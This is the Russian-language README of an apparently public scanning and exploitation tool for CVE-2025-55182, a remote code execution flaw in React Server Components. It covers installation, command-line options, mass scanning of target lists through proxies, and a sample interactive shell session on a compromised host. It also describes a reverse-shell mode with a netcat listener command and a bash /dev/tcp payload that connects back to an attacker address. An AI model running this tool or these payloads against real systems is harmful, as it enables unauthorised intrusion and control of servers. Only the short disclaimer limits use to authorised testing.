
Сканер критической уязвимости RCE для React Server Components (CVE-2025-55182). Автоматизированный фреймворк эксплуатации с поддержкой множества payload, возможностями прокси и интерактивным выполнением команд.
[!Warning] Этот репозиторий предназначен исключительно для образовательных и исследовательских целей.
- Используйте предоставленные PoC только на системах, которыми вы владеете или на которые имеете явное разрешение для тестирования.
- Несанкционированный доступ, эксплуатация или неправомерное использование любых материалов из этого репозитория являются незаконными.
- Автор(ы) не несут ответственности за любой ущерб, неправомерное использование или юридические последствия, возникшие в результате ненадлежащего использования.
CVE-2025-55182 — это критическая уязвимость удалённого выполнения кода, затрагивающая версии React Server Components 19.0.0, 19.1.0, 19.1.1 и 19.2.0. Эта уязвимость возникает из-за небезопасной десериализации полезных нагрузок HTTP-запросов к конечным точкам Server Function, что позволяет неаутентифицированным злоумышленникам удалённо выполнять произвольный код.
CVE ID: CVE-2025-55182
Затронутые версии:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| Аргумент | Описание |
|---|---|
-d, --detection | Режим обнаружения (сканирование на уязвимости) |
-e, --exploit | Режим эксплуатации (эксплуатация одной цели) |
-u, --url URL | URL одной цели для сканирования/эксплуатации |
-l, --list FILE | Файл со списком целевых URL (только режим обнаружения) |
-p, --proxy URL | URL одного прокси (например, http://127.0.0.1:8080) |
-pl, --proxy-list FILE | Файл со списком URL прокси (по одному на строку) |
-t, --threads N | Количество параллельных потоков (по умолчанию: 10, только режим обнаружения) |
-s, --silent | Тихий режим — показывать только уязвимые цели (только режим обнаружения) |
-o, --output [FILE] | Сохранить уязвимые цели в файл (только режим обнаружения). Если имя файла не указано, используется по умолчанию: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | Включить отладочное логирование — показывает детали ответов и повторные попытки (недоступно в тихом режиме) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Затем выберите [i] для интерактивной оболочки:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Затем выберите [r] для обратной оболочки и выберите тип полезной нагрузки:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
Инструмент автоматически попробует более 17 различных полезных нагрузок обратной оболочки, пока одна из них не сработает.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1